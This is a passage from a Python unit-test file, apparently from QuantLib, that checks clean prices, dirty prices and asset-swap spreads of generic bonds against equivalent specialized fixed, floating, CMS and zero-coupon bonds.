zeroCpnBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
zeroCpnBondMaturityDate2, zeroCpnBondStartDate2, zeroCpnBondLeg2)
zeroCpnBond2.setPricingEngine(bondEngine)
zeroCpnBondImpliedValue2 = zeroCpnBond2.cleanPrice()
zeroCpnBondSettlementDate2 = zeroCpnBond2.settlementDate()
## standard market conventions:
## bond's frequency + compounding and daycounter of the YieldCurve
zeroCpnBondCleanPrice2 = cleanPriceFromZSpread(zeroCpnBond2,
self.yieldCurve,
self.spread,
Actual365Fixed(),
self.compounding, Annual,
zeroCpnBondSettlementDate2)
error15 = abs(zeroCpnBondImpliedValue2-zeroCpnBondCleanPrice2)
self.assertFalse(error15>tolerance,
"wrong clean price for zero coupon bond:"
+ "\n zero cpn implied value: " + str(zeroCpnBondImpliedValue2)
+ "\n zero cpn price: " + str(zeroCpnBondCleanPrice2)
+ "\n error: " + str(error15)
+ "\n tolerance: " + str(tolerance))
def testSpecializedBondVsGenericBond(self) :
"""Testing clean and dirty prices for specialized bond against equivalent generic bond..."""
bondCalendar = TARGET()
settlementDays = 3
fixingDays = 2
inArrears = False
## Fixed Underlying bond (Isin: DE0001135275 DBR 4 01/04/37)
## maturity doesn't occur on a business day
fixedBondStartDate1 = Date(4,January,2005)
fixedBondMaturityDate1 = Date(4,January,2037)
fixedBondSchedule1 = Schedule(fixedBondStartDate1,
fixedBondMaturityDate1,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBondLeg1 = list(FixedRateLeg(fixedBondSchedule1, ActualActual(ActualActual.ISDA), [self.faceAmount],
[0.04]))
fixedbondRedemption1 = bondCalendar.adjust(fixedBondMaturityDate1, Following)
fixedBondLeg1.append(SimpleCashFlow(100.0, fixedbondRedemption1))
## generic bond
fixedBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
fixedBondMaturityDate1, fixedBondStartDate1,
fixedBondLeg1)
bondEngine = DiscountingBondEngine(self.termStructure)
fixedBond1.setPricingEngine(bondEngine)
## equivalent specialized fixed rate bond
fixedSpecializedBond1 = FixedRateBond(settlementDays, self.faceAmount, fixedBondSchedule1,
[0.04], ActualActual(ActualActual.ISDA), Following,
100.0, Date(4,January,2005))
fixedSpecializedBond1.setPricingEngine(bondEngine)
fixedBondTheoValue1 = fixedBond1.cleanPrice()
fixedSpecializedBondTheoValue1 = fixedSpecializedBond1.cleanPrice()
tolerance = 1.0e-13
error1 = abs(fixedBondTheoValue1-fixedSpecializedBondTheoValue1)
self.assertFalse(error1>tolerance,
"wrong clean price for fixed bond:"
+ "\n specialized fixed rate bond's theo clean price: " + str(fixedBondTheoValue1)
+ "\n generic equivalent bond's theo clean price: " + str(fixedSpecializedBondTheoValue1)
+ "\n error: " + str(error1)
+ "\n tolerance: " + str(tolerance))
fixedBondTheoDirty1 = fixedBondTheoValue1+fixedBond1.accruedAmount()
fixedSpecializedTheoDirty1 = fixedSpecializedBondTheoValue1+ fixedSpecializedBond1.accruedAmount()
error2 = abs(fixedBondTheoDirty1-fixedSpecializedTheoDirty1)
self.assertFalse(error2>tolerance,
"wrong dirty price for fixed bond:"
+ "\n specialized fixed rate bond's theo dirty price: " + str(fixedBondTheoDirty1)
+ "\n generic equivalent bond's theo dirty price: " + str(fixedSpecializedTheoDirty1)
+ "\n error: " + str(error2)
+ "\n tolerance: " + str(tolerance))
## Fixed Underlying bond (Isin: IT0006527060 IBRD 5 02/05/19)
## maturity occurs on a business day
fixedBondStartDate2 = Date(5,February,2005)
fixedBondMaturityDate2 = Date(5,February,2019)
fixedBondSchedule2 = Schedule(fixedBondStartDate2,
fixedBondMaturityDate2,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBondLeg2 = list(FixedRateLeg(fixedBondSchedule2, Thirty360(Thirty360.BondBasis),[self.faceAmount],[0.05]))
fixedbondRedemption2 = bondCalendar.adjust(fixedBondMaturityDate2, Following)
fixedBondLeg2.append(SimpleCashFlow(100.0, fixedbondRedemption2))
## generic bond
fixedBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
fixedBondMaturityDate2, fixedBondStartDate2, fixedBondLeg2)
fixedBond2.setPricingEngine(bondEngine)
## equivalent specialized fixed rate bond
fixedSpecializedBond2 = FixedRateBond(settlementDays, self.faceAmount, fixedBondSchedule2,
[0.05],Thirty360(Thirty360.BondBasis), Following,
100.0, Date(5,February,2005))
fixedSpecializedBond2.setPricingEngine(bondEngine)
fixedBondTheoValue2 = fixedBond2.cleanPrice()
fixedSpecializedBondTheoValue2 = fixedSpecializedBond2.cleanPrice()
error3 = abs(fixedBondTheoValue2-fixedSpecializedBondTheoValue2)
self.assertFalse(error3>tolerance,
"wrong clean price for fixed bond:"
+ "\n specialized fixed rate bond's theo clean price: " + str(fixedBondTheoValue2)
+ "\n generic equivalent bond's theo clean price: " + str(fixedSpecializedBondTheoValue2)
+ "\n error: " + str(error3)
+ "\n tolerance: " + str(tolerance))
fixedBondTheoDirty2 = fixedBondTheoValue2+ fixedBond2.accruedAmount()
fixedSpecializedBondTheoDirty2 = fixedSpecializedBondTheoValue2+ fixedSpecializedBond2.accruedAmount()
error4 = abs(fixedBondTheoDirty2-fixedSpecializedBondTheoDirty2)
self.assertFalse(error4>tolerance,
"wrong dirty price for fixed bond:"
+ "\n specialized fixed rate bond's dirty clean price: " + str(fixedBondTheoDirty2)
+ "\n generic equivalent bond's theo dirty price: " + str(fixedSpecializedBondTheoDirty2)
+ "\n error: " + str(error4)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: IT0003543847 ISPIM 0 09/29/13)
## maturity doesn't occur on a business day
floatingBondStartDate1 = Date(29,September,2003)
floatingBondMaturityDate1 = Date(29,September,2013)
floatingBondSchedule1 = Schedule(floatingBondStartDate1,
floatingBondMaturityDate1,
Period(Semiannual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
floatingBondLeg1 = list(IborLeg([self.faceAmount],floatingBondSchedule1, self.iborIndex,
Actual360(),Following,[fixingDays],[],[0.0056],[],[],inArrears))
floatingbondRedemption1 = bondCalendar.adjust(floatingBondMaturityDate1, Following)
floatingBondLeg1.append(SimpleCashFlow(100.0, floatingbondRedemption1))
## generic bond
floatingBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
floatingBondMaturityDate1, floatingBondStartDate1,
floatingBondLeg1)
floatingBond1.setPricingEngine(bondEngine)
## equivalent specialized floater
floatingSpecializedBond1 = FloatingRateBond(settlementDays, self.faceAmount,
floatingBondSchedule1,
self.iborIndex, Actual360(),
Following, fixingDays,
[1],
[0.0056],
[], [],
inArrears,
100.0, Date(29,September,2003))
floatingSpecializedBond1.setPricingEngine(bondEngine)
setCouponPricer(floatingBond1.cashflows(), self.pricer)
setCouponPricer(floatingSpecializedBond1.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(27,March,2007), 0.0402)
floatingBondTheoValue1 = floatingBond1.cleanPrice()
floatingSpecializedBondTheoValue1 = floatingSpecializedBond1.cleanPrice()
error5 = abs(floatingBondTheoValue1-
floatingSpecializedBondTheoValue1)
self.assertFalse(error5>tolerance,
"wrong clean price for fixed bond:"
+ "\n generic fixed rate bond's theo clean price: " + str(floatingBondTheoValue1)
+ "\n equivalent specialized bond's theo clean price: " + str(floatingSpecializedBondTheoValue1)
+ "\n error: " + str(error5)
+ "\n tolerance: " + str(tolerance))
floatingBondTheoDirty1 = floatingBondTheoValue1+ floatingBond1.accruedAmount()
floatingSpecializedBondTheoDirty1 = floatingSpecializedBondTheoValue1 + floatingSpecializedBond1.accruedAmount()
error6 = abs(floatingBondTheoDirty1-
floatingSpecializedBondTheoDirty1)
self.assertFalse(error6>tolerance,
"wrong dirty price for frn bond:"
+ "\n generic frn bond's dirty clean price: " + str(floatingBondTheoDirty1)
+ "\n equivalent specialized bond's theo dirty price: " + str(floatingSpecializedBondTheoDirty1)
+ "\n error: " + str(error6)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: XS0090566539 COE 0 09/24/18)
## maturity occurs on a business day
floatingBondStartDate2 = Date(24,September,2004)
floatingBondMaturityDate2 = Date(24,September,2018)
floatingBondSchedule2 = Schedule(floatingBondStartDate2,
floatingBondMaturityDate2,
Period(Semiannual), bondCalendar,
ModifiedFollowing, ModifiedFollowing,
DateGeneration.Backward, False)
floatingBondLeg2 = list(IborLeg([self.faceAmount], floatingBondSchedule2, self.iborIndex,
Actual360(),ModifiedFollowing,[fixingDays], [],[0.0025],[],[],inArrears))
floatingbondRedemption2 = bondCalendar.adjust(floatingBondMaturityDate2, ModifiedFollowing)
floatingBondLeg2.append(SimpleCashFlow(100.0, floatingbondRedemption2))
## generic bond
floatingBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
floatingBondMaturityDate2, floatingBondStartDate2,
floatingBondLeg2)
floatingBond2.setPricingEngine(bondEngine)
## equivalent specialized floater
floatingSpecializedBond2 = FloatingRateBond(settlementDays, self.faceAmount,
floatingBondSchedule2,
self.iborIndex, Actual360(),
ModifiedFollowing, fixingDays,
[1], [0.0025],
[], [],
inArrears,
100.0, Date(24,September,2004))
floatingSpecializedBond2.setPricingEngine(bondEngine)
setCouponPricer(floatingBond2.cashflows(), self.pricer)
setCouponPricer(floatingSpecializedBond2.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(22,March,2007), 0.04013)
floatingBondTheoValue2 = floatingBond2.cleanPrice()
floatingSpecializedBondTheoValue2 = floatingSpecializedBond2.cleanPrice()
error7 = abs(floatingBondTheoValue2-floatingSpecializedBondTheoValue2)
self.assertFalse(error7>tolerance,
"wrong clean price for floater bond:"
+ "\n generic floater bond's theo clean price: " + str(floatingBondTheoValue2)
+ "\n equivalent specialized bond's theo clean price: " + str(floatingSpecializedBondTheoValue2)
+ "\n error: " + str(error7)
+ "\n tolerance: " + str(tolerance))
floatingBondTheoDirty2 = floatingBondTheoValue2+ floatingBond2.accruedAmount()
floatingSpecializedTheoDirty2 = floatingSpecializedBondTheoValue2+ floatingSpecializedBond2.accruedAmount()
error8 = abs(floatingBondTheoDirty2-floatingSpecializedTheoDirty2)
self.assertFalse(error8>tolerance,
"wrong dirty price for floater bond:"
+ "\n generic floater bond's theo dirty price: " + str(floatingBondTheoDirty2)
+ "\n equivalent specialized bond's theo dirty price: " + str(floatingSpecializedTheoDirty2)
+ "\n error: " + str(error8)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0228052402 CRDIT 0 8/22/20)
## maturity doesn't occur on a business day
cmsBondStartDate1 = Date(22,August,2005)
cmsBondMaturityDate1 = Date(22,August,2020)
cmsBondSchedule1 = Schedule(cmsBondStartDate1,
cmsBondMaturityDate1,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBondLeg1 = list(CmsLeg([self.faceAmount],cmsBondSchedule1, self.swapIndex,
Thirty360(), Following, [fixingDays], [],[],[0.055],[0.025],inArrears))
cmsbondRedemption1 = bondCalendar.adjust(cmsBondMaturityDate1, Following)
cmsBondLeg1.append(SimpleCashFlow(100.0, cmsbondRedemption1))
## generic cms bond
cmsBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
cmsBondMaturityDate1, cmsBondStartDate1, cmsBondLeg1)
cmsBond1.setPricingEngine(bondEngine)
## equivalent specialized cms bond
cmsSpecializedBond1 = CmsRateBond(settlementDays, self.faceAmount, cmsBondSchedule1,
self.swapIndex, Thirty360(),
Following, fixingDays,
[1.0], [0.0],
[0.055],[0.025],
inArrears,
100.0, Date(22,August,2005))
cmsSpecializedBond1.setPricingEngine(bondEngine)
setCouponPricer(cmsBond1.cashflows(), self.cmspricer)
setCouponPricer(cmsSpecializedBond1.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(18,August,2006), 0.04158)
cmsBondTheoValue1 = cmsBond1.cleanPrice()
cmsSpecializedBondTheoValue1 = cmsSpecializedBond1.cleanPrice()
error9 = abs(cmsBondTheoValue1-cmsSpecializedBondTheoValue1)
self.assertFalse(error9>tolerance,
"wrong clean price for cms bond:"
+ "\n generic cms bond's theo clean price: " + str(cmsBondTheoValue1)
+ "\n equivalent specialized bond's theo clean price: " + str(cmsSpecializedBondTheoValue1)
+ "\n error: " + str(error9)
+ "\n tolerance: " + str(tolerance))
cmsBondTheoDirty1 = cmsBondTheoValue1+cmsBond1.accruedAmount()
cmsSpecializedBondTheoDirty1 = cmsSpecializedBondTheoValue1+ cmsSpecializedBond1.accruedAmount()
error10 = abs(cmsBondTheoDirty1-cmsSpecializedBondTheoDirty1)
self.assertFalse(error10>tolerance,
"wrong dirty price for cms bond:"
+ "\n generic cms bond's theo dirty price: " + str(cmsBondTheoDirty1)
+ "\n specialized cms bond's theo dirty price: " + str(cmsSpecializedBondTheoDirty1)
+ "\n error: " + str(error10)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0218766664 ISPIM 0 5/6/15)
## maturity occurs on a business day
cmsBondStartDate2 = Date(6,May,2005)
cmsBondMaturityDate2 = Date(6,May,2015)
cmsBondSchedule2 = Schedule(cmsBondStartDate2,
cmsBondMaturityDate2,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBondLeg2 = list(CmsLeg([self.faceAmount],cmsBondSchedule2, self.swapIndex,
Thirty360(),Following,[fixingDays],[0.84],[],[],[],inArrears))
cmsbondRedemption2 = bondCalendar.adjust(cmsBondMaturityDate2, Following)
cmsBondLeg2.append(SimpleCashFlow(100.0, cmsbondRedemption2))
## generic bond
cmsBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
cmsBondMaturityDate2, cmsBondStartDate2, cmsBondLeg2)
cmsBond2.setPricingEngine(bondEngine)
## equivalent specialized cms bond
cmsSpecializedBond2 = CmsRateBond(settlementDays, self.faceAmount, cmsBondSchedule2,
self.swapIndex, Thirty360(),
Following, fixingDays,
[0.84], [0.0],
[], [],
inArrears,
100.0, Date(6,May,2005))
cmsSpecializedBond2.setPricingEngine(bondEngine)
setCouponPricer(cmsBond2.cashflows(), self.cmspricer)
setCouponPricer(cmsSpecializedBond2.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(4,May,2006), 0.04217)
cmsBondTheoValue2 = cmsBond2.cleanPrice()
cmsSpecializedBondTheoValue2 = cmsSpecializedBond2.cleanPrice()
error11 = abs(cmsBondTheoValue2-cmsSpecializedBondTheoValue2)
self.assertFalse(error11>tolerance,
"wrong clean price for cms bond:"
+ "\n generic cms bond's theo clean price: " + str(cmsBondTheoValue2)
+ "\n cms bond's theo clean price: " + str(cmsSpecializedBondTheoValue2)
+ "\n error: " + str(error11)
+ "\n tolerance: " + str(tolerance))
cmsBondTheoDirty2 = cmsBondTheoValue2+cmsBond2.accruedAmount()
cmsSpecializedBondTheoDirty2 = cmsSpecializedBondTheoValue2+cmsSpecializedBond2.accruedAmount()
error12 = abs(cmsBondTheoDirty2-cmsSpecializedBondTheoDirty2)
self.assertFalse(error12>tolerance,
"wrong dirty price for cms bond:"
+ "\n generic cms bond's dirty price: " + str(cmsBondTheoDirty2)
+ "\n specialized cms bond's theo dirty price: " + str(cmsSpecializedBondTheoDirty2)
+ "\n error: " + str(error12)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: DE0004771662 IBRD 0 12/20/15)
## maturity doesn't occur on a business day
zeroCpnBondStartDate1 = Date(19,December,1985)
zeroCpnBondMaturityDate1 = Date(20,December,2015)
zeroCpnBondRedemption1 = bondCalendar.adjust(zeroCpnBondMaturityDate1,
Following)
zeroCpnBondLeg1 = Leg([SimpleCashFlow(100.0, zeroCpnBondRedemption1)])
## generic bond
zeroCpnBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
zeroCpnBondMaturityDate1, zeroCpnBondStartDate1, zeroCpnBondLeg1)
zeroCpnBond1.setPricingEngine(bondEngine)
## specialized zerocpn bond
zeroCpnSpecializedBond1 = ZeroCouponBond(settlementDays, bondCalendar, self.faceAmount,
Date(20,December,2015),
Following,
100.0, Date(19,December,1985))
zeroCpnSpecializedBond1.setPricingEngine(bondEngine)
zeroCpnBondTheoValue1 = zeroCpnBond1.cleanPrice()
zeroCpnSpecializedBondTheoValue1 = zeroCpnSpecializedBond1.cleanPrice()
error13 = abs(zeroCpnBondTheoValue1-zeroCpnSpecializedBondTheoValue1)
self.assertFalse(error13>tolerance,
"wrong clean price for zero coupon bond:"
+ "\n generic zero bond's clean price: " + str(zeroCpnBondTheoValue1)
+ "\n specialized zero bond's clean price: " + str(zeroCpnSpecializedBondTheoValue1)
+ "\n error: " + str(error13)
+ "\n tolerance: " + str(tolerance))
zeroCpnBondTheoDirty1 = zeroCpnBondTheoValue1+ zeroCpnBond1.accruedAmount()
zeroCpnSpecializedBondTheoDirty1 = zeroCpnSpecializedBondTheoValue1+ \
zeroCpnSpecializedBond1.accruedAmount()
error14 = abs(zeroCpnBondTheoDirty1-zeroCpnSpecializedBondTheoDirty1)
self.assertFalse(error14>tolerance,
"wrong dirty price for zero bond:"
+ "\n generic zerocpn bond's dirty price: " + str(zeroCpnBondTheoDirty1)
+ "\n specialized zerocpn bond's clean price: " + str(zeroCpnSpecializedBondTheoDirty1)
+ "\n error: " + str(error14)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: IT0001200390 ISPIM 0 02/17/28)
## maturity occurs on a business day
zeroCpnBondStartDate2 = Date(17,February,1998)
zeroCpnBondMaturityDate2 = Date(17,February,2028)
zerocpbondRedemption2 = bondCalendar.adjust(zeroCpnBondMaturityDate2,
Following)
zeroCpnBondLeg2 = Leg([SimpleCashFlow(100.0, zerocpbondRedemption2)])
## generic bond
zeroCpnBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
zeroCpnBondMaturityDate2, zeroCpnBondStartDate2, zeroCpnBondLeg2)
zeroCpnBond2.setPricingEngine(bondEngine)
## specialized zerocpn bond
zeroCpnSpecializedBond2 = ZeroCouponBond(settlementDays, bondCalendar, self.faceAmount,
Date(17,February,2028),
Following,
100.0, Date(17,February,1998))
zeroCpnSpecializedBond2.setPricingEngine(bondEngine)
zeroCpnBondTheoValue2 = zeroCpnBond2.cleanPrice()
zeroCpnSpecializedBondTheoValue2 = zeroCpnSpecializedBond2.cleanPrice()
error15 = abs(zeroCpnBondTheoValue2 -zeroCpnSpecializedBondTheoValue2)
self.assertFalse(error15>tolerance,
"wrong clean price for zero coupon bond:"
+ "\n generic zerocpn bond's clean price: " + str(zeroCpnBondTheoValue2)
+ "\n specialized zerocpn bond's clean price: " + str(zeroCpnSpecializedBondTheoValue2)
+ "\n error: " + str(error15)
+ "\n tolerance: " + str(tolerance))
zeroCpnBondTheoDirty2 = zeroCpnBondTheoValue2+ zeroCpnBond2.accruedAmount()
zeroCpnSpecializedBondTheoDirty2 = \
zeroCpnSpecializedBondTheoValue2+ \
zeroCpnSpecializedBond2.accruedAmount()
error16 = abs(zeroCpnBondTheoDirty2-zeroCpnSpecializedBondTheoDirty2)
self.assertFalse(error16>tolerance,
"wrong dirty price for zero coupon bond:"
+ "\n generic zerocpn bond's dirty price: " + str(zeroCpnBondTheoDirty2)
+ "\n specialized zerocpn bond's dirty price: " + str(zeroCpnSpecializedBondTheoDirty2)
+ "\n error: " + str(error16)
+ "\n tolerance: " + str(tolerance))
def testSpecializedBondVsGenericBondUsingAsw(self):
"""Testing asset-swap prices and spreads for specialized bond against equivalent generic bond..."""
bondCalendar = TARGET()
settlementDays = 3
fixingDays = 2
payFixedRate = True
parAssetSwap = True
inArrears = False
## Fixed bond (Isin: DE0001135275 DBR 4 01/04/37)
## maturity doesn't occur on a business day
fixedBondStartDate1 = Date(4,January,2005)
fixedBondMaturityDate1 = Date(4,January,2037)
fixedBondSchedule1 = Schedule(fixedBondStartDate1,
fixedBondMaturityDate1,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBondLeg1 = list(FixedRateLeg(fixedBondSchedule1,
ActualActual(ActualActual.ISDA), [self.faceAmount],[0.04]))
fixedbondRedemption1 = bondCalendar.adjust(fixedBondMaturityDate1, Following)
fixedBondLeg1.append(SimpleCashFlow(100.0, fixedbondRedemption1))
## generic bond
fixedBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
fixedBondMaturityDate1, fixedBondStartDate1, fixedBondLeg1)
bondEngine = DiscountingBondEngine(self.termStructure)
swapEngine = DiscountingSwapEngine(self.termStructure, False)
fixedBond1.setPricingEngine(bondEngine)
## equivalent specialized fixed rate bond
fixedSpecializedBond1 = FixedRateBond(settlementDays, self.faceAmount, fixedBondSchedule1,
[0.04], ActualActual(ActualActual.ISDA), Following,
100.0, Date(4,January,2005))
fixedSpecializedBond1.setPricingEngine(bondEngine)
fixedBondPrice1 = fixedBond1.cleanPrice()
fixedSpecializedBondPrice1 = fixedSpecializedBond1.cleanPrice()
fixedBondAssetSwap1 = AssetSwap(payFixedRate,
fixedBond1, fixedBondPrice1,
self.iborIndex, self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondAssetSwap1.setPricingEngine(swapEngine)
fixedSpecializedBondAssetSwap1 = AssetSwap(payFixedRate,
fixedSpecializedBond1,
fixedSpecializedBondPrice1,
self.iborIndex,
self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedSpecializedBondAssetSwap1.setPricingEngine(swapEngine)
fixedBondAssetSwapPrice1 = fixedBondAssetSwap1.fairCleanPrice()
fixedSpecializedBondAssetSwapPrice1 = fixedSpecializedBondAssetSwap1.fairCleanPrice()
tolerance = 1.0e-13
error1 = abs(fixedBondAssetSwapPrice1-fixedSpecializedBondAssetSwapPrice1)
self.assertFalse(error1>tolerance,
"wrong clean price for fixed bond:"
+ "\n generic fixed rate bond's clean price: " + str(fixedBondAssetSwapPrice1)
+ "\n equivalent specialized bond's clean price: " + str(fixedSpecializedBondAssetSwapPrice1)
+ "\n error: " + str(error1)
+ "\n tolerance: " + str(tolerance))
## market executable price as of 4th sept 2007
fixedBondMktPrice1= 91.832
fixedBondASW1 = AssetSwap(payFixedRate,
fixedBond1, fixedBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondASW1.setPricingEngine(swapEngine)
fixedSpecializedBondASW1 = AssetSwap(payFixedRate,
fixedSpecializedBond1,
fixedBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedSpecializedBondASW1.setPricingEngine(swapEngine)
fixedBondASWSpread1 = fixedBondASW1.fairSpread()
fixedSpecializedBondASWSpread1 = fixedSpecializedBondASW1.fairSpread()
error2 = abs(fixedBondASWSpread1-fixedSpecializedBondASWSpread1)
self.assertFalse(error2>tolerance,
"wrong asw spread for fixed bond:"
+ "\n generic fixed rate bond's asw spread: " + str(fixedBondASWSpread1)
+ "\n equivalent specialized bond's asw spread: " + str(fixedSpecializedBondASWSpread1)
+ "\n error: " + str(error2)
+ "\n tolerance: " + str(tolerance))
##Fixed bond (Isin: IT0006527060 IBRD 5 02/05/19)
##maturity occurs on a business day
fixedBondStartDate2 = Date(5,February,2005)
fixedBondMaturityDate2 = Date(5,February,2019)
fixedBondSchedule2 = Schedule(fixedBondStartDate2,
fixedBondMaturityDate2,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBondLeg2 = list(FixedRateLeg(fixedBondSchedule2, Thirty360(Thirty360.BondBasis),[self.faceAmount],
[0.05]))
fixedbondRedemption2 = bondCalendar.adjust(fixedBondMaturityDate2, Following)
fixedBondLeg2.append(SimpleCashFlow(100.0, fixedbondRedemption2))
## generic bond
fixedBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
fixedBondMaturityDate2, fixedBondStartDate2, fixedBondLeg2)
fixedBond2.setPricingEngine(bondEngine)
## equivalent specialized fixed rate bond
fixedSpecializedBond2 = FixedRateBond(settlementDays, self.faceAmount, fixedBondSchedule2,
[0.05], Thirty360(Thirty360.BondBasis), Following,
100.0, Date(5,February,2005))
fixedSpecializedBond2.setPricingEngine(bondEngine)
fixedBondPrice2 = fixedBond2.cleanPrice()
fixedSpecializedBondPrice2 = fixedSpecializedBond2.cleanPrice()
fixedBondAssetSwap2 = AssetSwap(payFixedRate,
fixedBond2, fixedBondPrice2,
self.iborIndex, self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondAssetSwap2.setPricingEngine(swapEngine)
fixedSpecializedBondAssetSwap2 = AssetSwap(payFixedRate,
fixedSpecializedBond2,
fixedSpecializedBondPrice2,
self.iborIndex,
self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedSpecializedBondAssetSwap2.setPricingEngine(swapEngine)
fixedBondAssetSwapPrice2 = fixedBondAssetSwap2.fairCleanPrice()
fixedSpecializedBondAssetSwapPrice2 = fixedSpecializedBondAssetSwap2.fairCleanPrice()
error3 = abs(fixedBondAssetSwapPrice2-fixedSpecializedBondAssetSwapPrice2)
self.assertFalse(error3>tolerance,
"wrong clean price for fixed bond:"
+ "\n generic fixed rate bond's clean price: " + str(fixedBondAssetSwapPrice2)
+ "\n equivalent specialized bond's clean price: " + str(fixedSpecializedBondAssetSwapPrice2)
+ "\n error: " + str(error3)
+ "\n tolerance: " + str(tolerance))
## market executable price as of 4th sept 2007
fixedBondMktPrice2= 102.178
fixedBondASW2 = AssetSwap(payFixedRate,
fixedBond2, fixedBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondASW2.setPricingEngine(swapEngine)
fixedSpecializedBondASW2 = AssetSwap(payFixedRate,
fixedSpecializedBond2,
fixedBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedSpecializedBondASW2.setPricingEngine(swapEngine)
fixedBondASWSpread2 = fixedBondASW2.fairSpread()
fixedSpecializedBondASWSpread2 = fixedSpecializedBondASW2.fairSpread()
error4 = abs(fixedBondASWSpread2-fixedSpecializedBondASWSpread2)
self.assertFalse(error4>tolerance,
"wrong asw spread for fixed bond:"
+ "\n generic fixed rate bond's asw spread: " + str(fixedBondASWSpread2)
+ "\n equivalent specialized bond's asw spread: " + str(fixedSpecializedBondASWSpread2)
+ "\n error: " + str(error4)
+ "\n tolerance: " + str(tolerance))
##FRN bond (Isin: IT0003543847 ISPIM 0 09/29/13)
##maturity doesn't occur on a business day
floatingBondStartDate1 = Date(29,September,2003)
floatingBondMaturityDate1 = Date(29,September,2013)
floatingBondSchedule1 = Schedule(floatingBondStartDate1,
floatingBondMaturityDate1,
Period(Semiannual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
floatingBondLeg1 = list(IborLeg([self.faceAmount],floatingBondSchedule1, self.iborIndex,
Actual360(), Following,[fixingDays],[],[0.0056],[],[],inArrears))
floatingbondRedemption1 = bondCalendar.adjust(floatingBondMaturityDate1, Following)
floatingBondLeg1.append(SimpleCashFlow(100.0, floatingbondRedemption1))
## generic bond
floatingBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
floatingBondMaturityDate1, floatingBondStartDate1,
floatingBondLeg1)
floatingBond1.setPricingEngine(bondEngine)
## equivalent specialized floater
floatingSpecializedBond1 = FloatingRateBond(settlementDays, self.faceAmount,
floatingBondSchedule1,
self.iborIndex, Actual360(),
Following, fixingDays,
[1],
[0.0056],
[], [],
inArrears,
100.0, Date(29,September,2003))
floatingSpecializedBond1.setPricingEngine(bondEngine)
setCouponPricer(floatingBond1.cashflows(), self.pricer)
setCouponPricer(floatingSpecializedBond1.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(27,March,2007), 0.0402)
floatingBondPrice1 = floatingBond1.cleanPrice()
floatingSpecializedBondPrice1= floatingSpecializedBond1.cleanPrice()
floatingBondAssetSwap1 = AssetSwap(payFixedRate,
floatingBond1, floatingBondPrice1,
self.iborIndex, self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondAssetSwap1.setPricingEngine(swapEngine)
floatingSpecializedBondAssetSwap1 = AssetSwap(payFixedRate,
floatingSpecializedBond1,
floatingSpecializedBondPrice1,
self.iborIndex,
self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingSpecializedBondAssetSwap1.setPricingEngine(swapEngine)
floatingBondAssetSwapPrice1 = floatingBondAssetSwap1.fairCleanPrice()
floatingSpecializedBondAssetSwapPrice1 = floatingSpecializedBondAssetSwap1.fairCleanPrice()
error5 = abs(floatingBondAssetSwapPrice1-floatingSpecializedBondAssetSwapPrice1)
self.assertFalse(error5>tolerance,
"wrong clean price for frnbond:"
+ "\n generic frn rate bond's clean price: " + str(floatingBondAssetSwapPrice1)
+ "\n equivalent specialized bond's price: " + str(floatingSpecializedBondAssetSwapPrice1)
+ "\n error: " + str(error5)
+ "\n tolerance: " + str(tolerance))
## market executable price as of 4th sept 2007
floatingBondMktPrice1= 101.33
floatingBondASW1 = AssetSwap(payFixedRate,
floatingBond1, floatingBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondASW1.setPricingEngine(swapEngine)
floatingSpecializedBondASW1 = AssetSwap(payFixedRate,
floatingSpecializedBond1,
floatingBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingSpecializedBondASW1.setPricingEngine(swapEngine)
floatingBondASWSpread1 = floatingBondASW1.fairSpread()
